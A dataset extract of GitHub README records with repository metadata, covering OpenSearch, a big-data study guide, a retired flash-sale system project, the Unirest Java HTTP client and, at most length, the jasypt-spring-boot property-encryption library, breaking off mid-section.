[![Open Pull Requests](https://img.shields.io/github/issues-pr/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/pulls)
[![2.14.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v2.14.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""v2.14.0"")
[![3.0.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v3.0.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""v3.0.0"")
[![GHA gradle check](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml)
[![GHA validate pull request](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml)
[![GHA precommit](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml)
[![Jenkins gradle check job](https://img.shields.io/jenkins/build?jobUrl=https%3A%2F%2Fbuild.ci.opensearch.org%2Fjob%2Fgradle-check%2F&label=Jenkins%20Gradle%20Check)](https://build.ci.opensearch.org/job/gradle-check/)
- [Welcome!](#welcome)
- [Project Resources](#project-resources)
- [Code of Conduct](#code-of-conduct)
- [Security](#security)
- [License](#license)
- [Copyright](#copyright)
- [Trademark](#trademark)
## Welcome!
**OpenSearch** is [a community-driven, open source fork](https://aws.amazon.com/blogs/opensource/introducing-opensearch/) of [Elasticsearch](https://en.wikipedia.org/wiki/Elasticsearch) and [Kibana](https://en.wikipedia.org/wiki/Kibana) following the [license change](https://blog.opensource.org/the-sspl-is-not-an-open-source-license/) in early 2021. We're looking to sustain (and evolve!) a search and analytics suite for the multitude of businesses who are dependent on the rights granted by the original, [Apache v2.0 License](LICENSE.txt).
## Project Resources
* [Project Website](https://opensearch.org/)
* [Downloads](https://opensearch.org/downloads.html)
* [Documentation](https://opensearch.org/docs/)
* Need help? Try [Forums](https://discuss.opendistrocommunity.dev/)
* [Project Principles](https://opensearch.org/#principles)
* [Contributing to OpenSearch](CONTRIBUTING.md)
* [Maintainer Responsibilities](MAINTAINERS.md)
* [Release Management](RELEASING.md)
* [Admin Responsibilities](ADMINS.md)
* [Testing](TESTING.md)
* [Security](SECURITY.md)
## Code of Conduct
This project has adopted the [Amazon Open Source Code of Conduct](CODE_OF_CONDUCT.md). For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq), or contact [opensource-codeofconduct@amazon.com](mailto:opensource-codeofconduct@amazon.com) with any additional questions or comments.
## Security
If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/) or directly via email to aws-security@amazon.com. Please do **not** create a public GitHub issue.
## License
This project is licensed under the [Apache v2.0 License](LICENSE.txt).
## Copyright
Copyright OpenSearch Contributors. See [NOTICE](NOTICE.txt) for details.
## Trademark
OpenSearch is a registered trademark of Amazon Web Services.
OpenSearch includes certain Apache-licensed Elasticsearch code from Elasticsearch B.V. and other source code. Elasticsearch B.V. is not the source of that other source code. ELASTICSEARCH is a registered trademark of Elasticsearch B.V.
"
MoRan1607/BigDataGuide,master,2491,838,2019-11-30T12:02:52Z,130167,0,大数据学习,从零开始学习大数据,包含大数据学习各阶段学习视频、面试资料,bigdata flink flume hadoop hbase hive javase kafka scala spark zookeeper,"Big Data Learning Guide
===
>A guide for learning big data development from scratch, with resources collected for every stage of the learning path
## WeChat Official Account
Follow my WeChat official account **旧时光大数据** and reply with the corresponding keyword to get more big data tips and materials
For the videos and documents in the “Big Data Learning Path” that I have gone through myself, the cloud drive links can be obtained directly from the official account
## Still being updated...
#### Interview write-ups from Niuke (nowcoder)
#### Big data interview questions
### 《[Big Data Interview Questions V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ)》 is out; reply 大数据面试题 on the official account to get it
"
qiurunze123/miaosha,master,26041,6646,2018-09-14T04:36:24Z,65690,1,⭐⭐⭐⭐秒杀系统设计与实现.互联网工程师进阶与分析🙋🐓,,"![互联网 Java 秒杀系统设计与架构](https://raw.githubusercontent.com/qiurunze123/imageall/master/miaoshashejitu.png)
> Friends, thank you all for supporting my articles. Time has flown by;
this content was written a few years ago when I had just graduated, and it was only a personal project. It was heavily criticized in a WeChat official account article; I read the author's points, and after getting home that evening I wrote a brief reply.
After thinking it over, since I really don't have the energy to maintain it and it could mislead beginners, I have decided to take this project offline. It was my first project, so let it become a memory, and save myself the trouble!
You are still welcome to discuss other questions with me on WeChat, and I will answer when I have time!
>1. Please view it rationally
My original intention was to express some of my own ideas and directions. Because the stars surged, I put together an initial plan; that was not long after I graduated. I'm honored that the project grew from a small one into a big one, but it reflects immature ideas from that time and was never fully finished.
It was only an entry-level practice project meant for learning more. So when you look at this project, please bring your own thinking and filtering instead of copying it blindly! Finally, for those who were less than rational, I recommend two books, 《我就是你啊》 and 《非暴力沟通》 (Nonviolent Communication); they might help you grow!
"
Kong/unirest-java,main,2563,591,2011-04-11T21:19:53Z,3793,5,"Unirest in Java: Simplified, lightweight HTTP client library.",,"# Unirest for Java
[![Actions Status](https://github.com/kong/unirest-java/workflows/Verify/badge.svg)](https://github.com/kong/unirest-java/actions)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.konghq/unirest-java-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.kong/unirest-java)
[![Javadocs](http://www.javadoc.io/badge/com.konghq/unirest-java-core.svg)](http://www.javadoc.io/doc/com.konghq/unirest-java)
## Unirest 4
Unirest 4 is built on modern Java standards, and as such requires at least Java 11.
Unirest 4's dependencies are fully modular, and have been moved to new Maven coordinates to avoid conflicts with the previous versions.
You can use a maven bom to manage the modules:
### Install With Maven
```xml
<dependencyManagement>
    <dependencies>
        <dependency>
            <groupId>com.konghq</groupId>
            <artifactId>unirest-java-bom</artifactId>
            <version>4.3.1</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
    </dependencies>
</dependencyManagement>

<dependencies>
    <dependency>
        <groupId>com.konghq</groupId>
        <artifactId>unirest-java-core</artifactId>
    </dependency>
    <dependency>
        <groupId>com.konghq</groupId>
        <artifactId>unirest-modules-gson</artifactId>
    </dependency>
    <dependency>
        <groupId>com.konghq</groupId>
        <artifactId>unirest-modules-jackson</artifactId>
    </dependency>
</dependencies>
```
#### 🚨 Attention JSON users 🚨
Under Unirest 4, the core module no longer comes with ANY transitive dependencies, and because Java itself lacks a JSON parser you MUST declare a JSON implementation if you wish to do object mappings or use JSON objects.
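As a quick illustration of that requirement, here is a minimal sketch (not from the original README; it assumes Unirest 4 with the `unirest-java-core` and `unirest-modules-jackson` artifacts above on the classpath, the `kong.unirest.core` package namespace, and a hypothetical target URL):
```java
import kong.unirest.core.HttpResponse;
import kong.unirest.core.JsonNode;
import kong.unirest.core.Unirest;

public class UnirestJsonSketch {
    public static void main(String[] args) {
        // Plain string bodies need only unirest-java-core.
        HttpResponse<String> text = Unirest.get(""https://httpbin.org/get"").asString();
        System.out.println(text.getStatus());

        // JSON mapping (asJson/asObject) needs a declared JSON module such as
        // unirest-modules-jackson; without one it fails at runtime.
        HttpResponse<JsonNode> json = Unirest.get(""https://httpbin.org/get"").asJson();
        System.out.println(json.getBody().getObject().getString(""url""));
    }
}
```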
## Upgrading from Previous Versions
See the [Upgrade Guide](UPGRADE_GUIDE.md)
## ChangeLog
See the [Change Log](CHANGELOG.md) for recent changes.
## Documentation
Our [Documentation](http://kong.github.io/unirest-java/)
## Unirest 3
### Maven
```xml
<dependency>
    <groupId>com.konghq</groupId>
    <artifactId>unirest-java</artifactId>
    <version>3.14.1</version>
</dependency>
```
"
ulisesbocchio/jasypt-spring-boot,master,2788,502,2015-05-27T14:00:55Z,622,52,Jasypt integration for Spring boot,encryptable-properties encryption java java-8 java8 security spring spring-boot spring-boot-2 spring-boot-starter spring-boot2 web webapp website,"# jasypt-spring-boot
**[Jasypt](http://www.jasypt.org)** integration for Spring boot 2.x and 3.0.0
[![Build Status](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot.svg?branch=master)](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot)
[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ulisesbocchio/jasypt-spring-boot?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot)
[![Code Climate](https://codeclimate.com/github/rsercano/mongoclient/badges/gpa.svg)](https://codeclimate.com/github/ulisesbocchio/jasypt-spring-boot)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/6a75fc4e1d3f480f811b5339202400b5)](https://www.codacy.com/app/ulisesbocchio/jasypt-spring-boot?utm_source=github.com&utm_medium=referral&utm_content=ulisesbocchio/jasypt-spring-boot&utm_campaign=Badge_Grade)
[![GitHub release](https://img.shields.io/github/release/ulisesbocchio/jasypt-spring-boot.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![Github All Releases](https://img.shields.io/github/downloads/ulisesbocchio/jasypt-spring-boot/total.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](https://github.com/ulisesbocchio/jasypt-spring-boot/blob/master/LICENSE)
[![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![Paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=9J2V5HJT8AZF8)
[![""Buy Me A Coffee""](https://www.buymeacoffee.com/assets/img/custom_images/yellow_img.png)](https://www.buymeacoffee.com/ulisesbd)
Jasypt Spring Boot provides Encryption support for property sources in Spring Boot Applications.
There are 3 ways to integrate `jasypt-spring-boot` in your project:
- Simply adding the starter jar `jasypt-spring-boot-starter` to your classpath if using `@SpringBootApplication` or `@EnableAutoConfiguration` will enable encryptable properties across the entire Spring Environment
- Adding `jasypt-spring-boot` to your classpath and adding `@EnableEncryptableProperties` to your main Configuration class to enable encryptable properties across the entire Spring Environment
- Adding `jasypt-spring-boot` to your classpath and declaring individual encryptable property sources with `@EncryptablePropertySource`
## What's new?
### Go to [Releases](https://github.com/ulisesbocchio/jasypt-spring-boot/releases)
## What to do First?
Use one of the following 3 methods (briefly explained above):
1. Simply add the starter jar dependency to your project if your Spring Boot application uses `@SpringBootApplication` or `@EnableAutoConfiguration` and encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, application-*.properties, yaml properties, and any other property sources can contain encrypted properties):
```xml
<dependency>
    <groupId>com.github.ulisesbocchio</groupId>
    <artifactId>jasypt-spring-boot-starter</artifactId>
    <version>3.0.5</version>
</dependency>
```
2. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations then add this dependency to your project:
```xml
<dependency>
    <groupId>com.github.ulisesbocchio</groupId>
    <artifactId>jasypt-spring-boot</artifactId>
    <version>3.0.5</version>
</dependency>
```
And then add `@EnableEncryptableProperties` to you Configuration class. For instance:
```java
@Configuration
@EnableEncryptableProperties
public class MyApplication {
...
}
```
And encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, yaml properties, and any other custom property sources can contain encrypted properties)
3. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations and you don't want to enable encryptable properties across the entire Spring Environment, there's a third option. First add the following dependency to your project:
```xml
<dependency>
    <groupId>com.github.ulisesbocchio</groupId>
    <artifactId>jasypt-spring-boot</artifactId>
    <version>3.0.5</version>
</dependency>
```
And then add as many `@EncryptablePropertySource` annotations as you want in your Configuration files. Just like you do with Spring's `@PropertySource` annotation. For instance:
```java
@Configuration
@EncryptablePropertySource(name = ""EncryptedProperties"", value = ""classpath:encrypted.properties"")
public class MyApplication {
...
}
```
Conveniently, there's also a `@EncryptablePropertySources` annotation that one could use to group annotations of type `@EncryptablePropertySource` like this:
```java
@Configuration
@EncryptablePropertySources({@EncryptablePropertySource(""classpath:encrypted.properties""),
@EncryptablePropertySource(""classpath:encrypted2.properties"")})
public class MyApplication {
...
}
```
Also, note that as of version 1.8, `@EncryptablePropertySource` supports YAML files
## Custom Environment
As of version ~~1.7~~ 1.15, a 4th method of enabling encryptable properties exists for some special cases. A custom `ConfigurableEnvironment` class is provided: ~~`EncryptableEnvironment`~~ `StandardEncryptableEnvironment` and `StandardEncryptableServletEnvironment` that can be used with `SpringApplicationBuilder` to define the custom environment this way:
```java
new SpringApplicationBuilder()
.environment(new StandardEncryptableEnvironment())
.sources(YourApplicationClass.class).run(args);
```
This method only requires a dependency on `jasypt-spring-boot`; no starter jar dependency is needed. It is useful for early access to encrypted properties on bootstrap. While not required in most scenarios, it can be useful when customizing Spring Boot's init behavior or integrating with capabilities that are configured very early, such as logging configuration. For a concrete example, this method of enabling encryptable properties is the only one that works with Spring property replacement in `logback-spring.xml` files using the `springProperty` tag. For instance:
```xml
<connectionSource class=""ch.qos.logback.core.db.DriverManagerConnectionSource"">
    <driverClass>org.postgresql.Driver</driverClass>
    <url>jdbc:postgresql://localhost:5432/simple</url>
    <user>${user}</user>
    <password>${password}</password>
</connectionSource>
```
This mechanism could be used for instance (as shown) to initialize Database Logging Appender that require sensitive credentials to be passed.
Alternatively, if a custom `StringEncryptor` is needed to be provided, a static builder method is provided `StandardEncryptableEnvironment#builder` for customization (other customizations are possible):
```java
StandardEncryptableEnvironment
.builder()
.encryptor(new MyEncryptor())
.build()
```
## How everything Works?
This will trigger some configuration to be loaded that basically does 2 things:
1. It registers a Spring post processor that decorates all PropertySource objects contained in the Spring Environment so they are ""encryption aware"" and detect when properties are encrypted following jasypt's property convention.
2. It defines a default `StringEncryptor` that can be configured through regular properties, system properties, or command line arguments.
## Where do I put my encrypted properties?
When using METHODS 1 and 2 you can define encrypted properties in any of the PropertySource contained in the Environment. For instance, using the @PropertySource annotation:
```java
@SpringBootApplication
@EnableEncryptableProperties
@PropertySource(name=""EncryptedProperties"", value = ""classpath:encrypted.properties"")
public class MyApplication {
...
}
```
And your encrypted.properties file would look something like this:
```properties
secret.property=ENC(nrmZtkF7T0kjG/VodDvBw93Ct8EgjCA+)
```
Now when you do `environment.getProperty(""secret.property"")` or use `@Value(""${secret.property}"")` what you get is the decrypted version of `secret.property`.
When using METHOD 3 (`@EncryptablePropertySource`) then you can access the encrypted properties the same way, the only difference is that you must put the properties in the resource that was declared within the `@EncryptablePropertySource` annotation so that the properties can be decrypted properly.
## Password-based Encryption Configuration
Jasypt uses an `StringEncryptor` to decrypt properties. For all 3 methods, if no custom `StringEncryptor` (see the [Custom Encryptor](#customEncryptor) section for details) is found in the Spring Context, one is created automatically that can be configured through the following properties (System, properties file, command line arguments, environment variable, etc.):
| Key | Required | Default Value |
|-----|----------|---------------|
| jasypt.encryptor.password | True | - |
| jasypt.encryptor.algorithm | False | PBEWITHHMACSHA512ANDAES_256 |
| jasypt.encryptor.key-obtention-iterations | False | 1000 |
| jasypt.encryptor.pool-size | False | 1 |
| jasypt.encryptor.provider-name | False | SunJCE |
| jasypt.encryptor.provider-class-name | False | null |
| jasypt.encryptor.salt-generator-classname | False | org.jasypt.salt.RandomSaltGenerator |
| jasypt.encryptor.iv-generator-classname | False | org.jasypt.iv.RandomIvGenerator |
| jasypt.encryptor.string-output-type | False | base64 |
| jasypt.encryptor.proxy-property-sources | False | false |
| jasypt.encryptor.skip-property-sources | False | empty list |
The only required property is the encryption password; the rest can be left at their default values. While all of these properties could be declared in a properties file, the encryptor password should not be stored there; it should rather be passed as a system property, command line argument, or environment variable, and as long as it is named `jasypt.encryptor.password` it will work.
The last property, `jasypt.encryptor.proxyPropertySources`, tells `jasypt-spring-boot` how property values are going to be intercepted for decryption. The default value, `false`, uses custom wrapper implementations of `PropertySource`, `EnumerablePropertySource`, and `MapPropertySource`. When `true` is specified, the interception mechanism uses CGLib proxies on each specific `PropertySource` implementation. This may be useful in scenarios where the type of the original `PropertySource` must be preserved.
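For instance, switching to the proxy mechanism is just a matter of flipping that flag (a minimal illustration in `application.properties`, not taken from the original README):
```properties
# Intercept property sources with CGLib proxies instead of the default wrappers,
# preserving the concrete PropertySource types.
jasypt.encryptor.proxy-property-sources=true
```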
## Use your own Custom Encryptor
For custom configuration of the encryptor and the source of the encryptor password you can always define your own StringEncryptor bean in your Spring Context, and the default encryptor will be ignored. For instance:
```java
@Bean(""jasyptStringEncryptor"")
public StringEncryptor stringEncryptor() {
PooledPBEStringEncryptor encryptor = new PooledPBEStringEncryptor();
SimpleStringPBEConfig config = new SimpleStringPBEConfig();
config.setPassword(""password"");
config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256"");
config.setKeyObtentionIterations(""1000"");
config.setPoolSize(""1"");
config.setProviderName(""SunJCE"");
config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator"");
config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator"");
config.setStringOutputType(""base64"");
encryptor.setConfig(config);
return encryptor;
}
```
Notice that the bean name is required, as `jasypt-spring-boot` detects custom String Encryptors by name as of version `1.5`. The default bean name is:
``` jasyptStringEncryptor ```
But one can also override this by defining property:
``` jasypt.encryptor.bean ```
So for instance, if you define `jasypt.encryptor.bean=encryptorBean` then you would define your custom encryptor with that name:
```java
@Bean(""encryptorBean"")
public StringEncryptor stringEncryptor() {
...
}
```
## Custom Property Detector, Prefix, Suffix and/or Resolver
As of `jasypt-spring-boot-1.10` there are new extensions points. `EncryptablePropertySource` now uses `EncryptablePropertyResolver` to resolve all properties:
```java
public interface EncryptablePropertyResolver {
String resolvePropertyValue(String value);
}
```
Implementations of this interface are responsible for both **detecting** and **decrypting** properties. The default implementation, `DefaultPropertyResolver`, uses the aforementioned `StringEncryptor` and a new `EncryptablePropertyDetector`.
### Provide a Custom `EncryptablePropertyDetector`
You can override the default implementation by providing a bean of type `EncryptablePropertyDetector` named `encryptablePropertyDetector`, or, if you want to use your own bean name, override the property `jasypt.encryptor.property.detector-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for detecting encrypted properties.
Example:
```java
private static class MyEncryptablePropertyDetector implements EncryptablePropertyDetector {
@Override
public boolean isEncrypted(String value) {
if (value != null) {
return value.startsWith(""ENC@"");
}
return false;
}
@Override
public String unwrapEncryptedValue(String value) {
return value.substring(""ENC@"".length());
}
}
```
```java
@Bean(name = ""encryptablePropertyDetector"")
public EncryptablePropertyDetector encryptablePropertyDetector() {
return new MyEncryptablePropertyDetector();
}
```
### Provide a Custom Encrypted Property `prefix` and `suffix`
If all you want to do is to have different prefix/suffix for encrypted properties, you can keep using all the default implementations
and just override the following properties in `application.properties` (or `application.yml`):
```YAML
jasypt:
encryptor:
property:
prefix: ""ENC@[""
suffix: ""]""
```
### Provide a Custom `EncryptablePropertyResolver`
You can override the default implementation by providing a bean of type `EncryptablePropertyResolver` named `encryptablePropertyResolver`, or, if you want to use your own bean name, override the property `jasypt.encryptor.property.resolver-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for detecting and decrypting encrypted properties.
Example:
```java
class MyEncryptablePropertyResolver implements EncryptablePropertyResolver {
private final PooledPBEStringEncryptor encryptor;
public MyEncryptablePropertyResolver(char[] password) {
this.encryptor = new PooledPBEStringEncryptor();
SimpleStringPBEConfig config = new SimpleStringPBEConfig();
config.setPasswordCharArray(password);
config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256"");
config.setKeyObtentionIterations(""1000"");
config.setPoolSize(1);
config.setProviderName(""SunJCE"");
config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator"");
config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator"");
config.setStringOutputType(""base64"");
encryptor.setConfig(config);
}
@Override
public String resolvePropertyValue(String value) {
if (value != null && value.startsWith(""{cipher}"")) {
return encryptor.decrypt(value.substring(""{cipher}"".length()));
}
return value;
}
}
```
```java
@Bean(name=""encryptablePropertyResolver"")
EncryptablePropertyResolver encryptablePropertyResolver(@Value(""${jasypt.encryptor.password}"") String password) {
return new MyEncryptablePropertyResolver(password.toCharArray());
}
```
Notice that by overriding `EncryptablePropertyResolver`, any other configuration or overrides you may have for prefixes, suffixes,
`EncryptablePropertyDetector` and `StringEncryptor` will stop working since the Default resolver is what uses them. You'd have to
wire all that stuff yourself. Fortunately, you don't have to override this bean in most cases, the previous options should suffice.
But as you can see in the implementation, the detection and decryption of the encrypted properties are internal to `MyEncryptablePropertyResolver`
## Using Filters
`jasypt-spring-boot:2.1.0` introduces a new feature to specify property filters. The filter is part of the `EncryptablePropertyResolver` API
and allows you to determine which properties or property sources to consider for decryption, before even examining the actual property value to detect or decrypt it. For instance, by default, all properties whose names start with `jasypt.encryptor`
are excluded from examination. This is to avoid circular dependencies at load time when the library beans are configured.
### DefaultPropertyFilter properties
By default, the `DefaultPropertyResolver` uses `DefaultPropertyFilter`, which allows you to specify the following string pattern lists:
* jasypt.encryptor.property.filter.include-sources: Specify the property sources name patterns to be included for decryption
* jasypt.encryptor.property.filter.exclude-sources: Specify the property sources name patterns to be EXCLUDED for decryption
* jasypt.encryptor.property.filter.include-names: Specify the property name patterns to be included for decryption
* jasypt.encryptor.property.filter.exclude-names: Specify the property name patterns to be EXCLUDED for decryption
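For illustration, the four lists could be combined like this (a hypothetical sketch; the source and property name patterns below are made up):
```properties
# Only examine the application's own config files for encrypted values...
jasypt.encryptor.property.filter.include-sources=applicationConfig.*
# ...and never the OS environment.
jasypt.encryptor.property.filter.exclude-sources=systemEnvironment
# Within those sources, only attempt decryption for names under secret.,
# except for secret.plain.
jasypt.encryptor.property.filter.include-names=secret\..*
jasypt.encryptor.property.filter.exclude-names=secret\.plain
```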
### Provide a custom `EncryptablePropertyFilter`
You can override the default implementation by providing a bean of type `EncryptablePropertyFilter` named `encryptablePropertyFilter`, or, if you want to use your own bean name, override the property `jasypt.encryptor.property.filter-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for deciding which properties and/or property sources to consider for decryption.
Example:
```java
class MyEncryptablePropertyFilter implements EncryptablePropertyFilter {
public boolean shouldInclude(PropertySource<?> source, String name) {
return name.startsWith(""encrypted."");
}
}
```
```java
@Bean(name=""encryptablePropertyFilter"")
EncryptablePropertyFilter encryptablePropertyFilter() {
return new MyEncryptablePropertyFilter();
}
```
Notice that for this mechanism to work, you should not provide a custom `EncryptablePropertyResolver` and use the default
resolver instead. If you provide custom resolver, you are responsible for the entire process of detecting and decrypting
properties.
## Filter out `PropertySource` classes from being introspected
Define a comma-separated list of fully-qualified class names to be skipped from introspection. These classes will not be wrapped/proxied by this plugin, and therefore properties contained in them won't support encryption/decryption:
```properties
jasypt.encryptor.skip-property-sources=org.springframework.boot.env.RandomValuePropertySource,org.springframework.boot.ansi.AnsiPropertySource
```
## Encryptable Properties cache refresh
Encrypted properties are cached within your application and in certain scenarios, like when using externalized configuration
from a config server the properties need to be refreshed when they changed. For this `jasypt-spring-boot` registers a
`RefreshScopeRefreshedEventListener` that listens to the following events by default to clear the encrypted properties cache:
```java
public static final List<String> EVENT_CLASS_NAMES = Arrays.asList(
""org.springframework.cloud.context.scope.refresh.RefreshScopeRefreshedEvent"",
""org.springframework.cloud.context.environment.EnvironmentChangeEvent"",
""org.springframework.boot.web.servlet.context.ServletWebServerInitializedEvent""
);
```
Should you need to register extra events that you would like to trigger an encrypted cache invalidation you can add them
using the following property (separate by comma if more than one needed):
```properties
jasypt.encryptor.refreshed-event-classes=org.springframework.boot.context.event.ApplicationStartedEvent
```
## Maven Plugin
A Maven plugin is provided with a number of helpful utilities.
To use the plugin, just add the following to your pom.xml:
```xml
com.github.ulisesbocchiojasypt-maven-plugin3.0.5
```
When using this plugin, the easiest way to provide your encryption password is via a system property i.e.
-Djasypt.encryptor.password=""the password"".
By default, the plugin will consider encryption configuration in standard Spring boot configuration files under
./src/main/resources. You can also use system properties or environment variables to supply this configuration.
Keep in mind that the rest of your application code and resources are not available to the plugin because Maven plugins
do not share a classpath with projects. If your application provides encryption configuration via a StringEncryptor
bean then this will not be picked up.
In general, it is recommended to just rely on the secure default configuration.
### Encryption
To encrypt a single value run:
```bash
mvn jasypt:encrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""theValueYouWantToEncrypt""
```
To encrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `DEC(...)`.
For example:
```properties
sensitive.password=DEC(secret value)
regular.property=example
```
Then run:
```bash
mvn jasypt:encrypt -Djasypt.encryptor.password=""the password""
```
Which would edit that file in place resulting in:
```properties
sensitive.password=ENC(encrypted)
regular.property=example
```
The file name and location can be customised.
### Decryption
To decrypt a single value run:
```bash
mvn jasypt:decrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""DbG1GppXOsFa2G69PnmADvQFI3esceEhJYbaEIKCcEO5C85JEqGAhfcjFMGnoRFf""
```
To decrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `ENC(...)`. For
example:
```properties
sensitive.password=ENC(encrypted)
regular.property=example
```
This can be decrypted as follows:
```bash
mvn jasypt:decrypt -Djasypt.encryptor.password=""the password""
```
Which would output the decrypted contents to the screen:
```properties
sensitive.password=DEC(decrypted)
regular.property=example
```
Note that outputting to the screen, rather than editing the file in place, is designed to reduce
accidental committing of decrypted values to version control. When decrypting, you most likely
just want to check what value has been encrypted, rather than wanting to permanently decrypt that
value.
### Re-encryption
Changing the configuration for existing encrypted properties is slightly awkward using the encrypt/decrypt goals. You
must run the decrypt goal using the old configuration, then copy the decrypted output back into the original file, then
run the encrypt goal with the new configuration.
The re-encrypt goal simplifies this by re-encrypting a file in place. 2 sets of configuration must be provided. The
new configuration is supplied in the same way as you would configure the other maven goals. The old configuration
is supplied via system properties prefixed with ""jasypt.plugin.old"" instead of ""jasypt.encryptor"".
For example, to re-encrypt application.properties that was previously encrypted with the password OLD and then
encrypt with the new password NEW:
```bash
mvn jasypt:reencrypt -Djasypt.plugin.old.password=OLD -Djasypt.encryptor.password=NEW
```
*Note: All old configuration must be passed as system properties. Environment variables and Spring Boot configuration
files are not supported.*
### Upgrade
Sometimes the default encryption configuration might change between versions of jasypt-spring-boot. You can
automatically upgrade your encrypted properties to the new defaults with the upgrade goal. This will decrypt your
application.properties file using the old default configuration and re-encrypt using the new default configuration.
```bash
mvn jasypt:upgrade -Djasypt.encryptor.password=EXAMPLE
```
You can also pass the system property `-Djasypt.plugin.old.major-version` to specify the version you are upgrading from.
This will always default to the last major version where the configuration changed. Currently, the only major version
where the defaults changed is version 2, so there is no need to set this property, but it is there for future use.
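For example, to state the old major version explicitly (a sketch reusing the properties named above):
```bash
mvn jasypt:upgrade -Djasypt.encryptor.password=EXAMPLE -Djasypt.plugin.old.major-version=2
```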
### Load
You can also decrypt a properties file and load all of its properties into memory and make them accessible to Maven. This is useful when you want to make encrypted properties available to other Maven plugins.
You can chain the goals of the later plugins directly after this one. For example, with flyway:
```bash
mvn jasypt:load flyway:migrate -Djasypt.encryptor.password=""the password""
```
You can also specify a prefix for each property with `-Djasypt.plugin.keyPrefix=example.`. This
helps to avoid potential clashes with other Maven properties.
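Putting the two together, a prefixed load chained into a Flyway migration might look like this (illustrative only):
```bash
mvn jasypt:load flyway:migrate -Djasypt.plugin.keyPrefix=example. -Djasypt.encryptor.password=""the password""
```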
### Changing the file path
For all the above utilities, the path of the file you are encrypting/decrypting defaults to
`file:src/main/resources/application.properties`.
This can be changed using the `-Djasypt.plugin.path` system property.
You can encrypt a file in your test resources directory:
```bash
mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/test/application.properties"" -Djasypt.encryptor.password=""the password""
```
Or with a different name:
```bash
mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/resources/flyway.properties"" -Djasypt.encryptor.password=""the password""
```
Or with a different file type (the plugin supports any plain text file format including YAML):
```bash
mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/resources/application.yaml"" -Djasypt.encryptor.password=""the password""
```
**Note that the load goal only supports .property files**
### Spring profiles and other spring config
You can override any spring config you support in your application when running the plugin, for instance selecting a given spring profile:
```bash
mvn jasypt:encrypt -Dspring.profiles.active=cloud -Djasypt.encryptor.password=""the password""
```
### Multi-module maven projects
To encrypt/decrypt properties in multi-module projects disable recursion with `-N` or `--non-recursive` on the maven command:
```bash
mvn jasypt:upgrade -Djasypt.plugin.path=file:server/src/test/resources/application-test.properties -Djasypt.encryptor.password=supersecret -N
```
## Asymmetric Encryption
`jasypt-spring-boot:2.1.1` introduces a new feature to encrypt/decrypt properties using asymmetric encryption with a pair of private/public keys
in DER or PEM formats.
### Config Properties
The following are the configuration properties you can use to config asymmetric decryption of properties;
| Key | Default Value | Description |
|-----|---------------|-------------|
| jasypt.encryptor.privateKeyString | null | private key for decryption in String format |
| jasypt.encryptor.privateKeyLocation | null | location of the private key for decryption in spring resource format |
| jasypt.encryptor.privateKeyFormat | DER | Key format. DER or PEM |
You should either use `privateKeyString` or `privateKeyLocation`, the String format takes precedence if set.
To specify a private key in DER format with `privateKeyString`, please encode the key bytes to `base64`.
__Note__ that `jasypt.encryptor.password` still takes precedence for PBE encryption over the asymmetric config.
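If you still need to generate such a key pair, one possible approach (an assumption, not part of the original README) is OpenSSL: convert the private key to PKCS#8 DER and base64-encode it:
```bash
# Generate an RSA key pair and convert the private key to PKCS#8 DER
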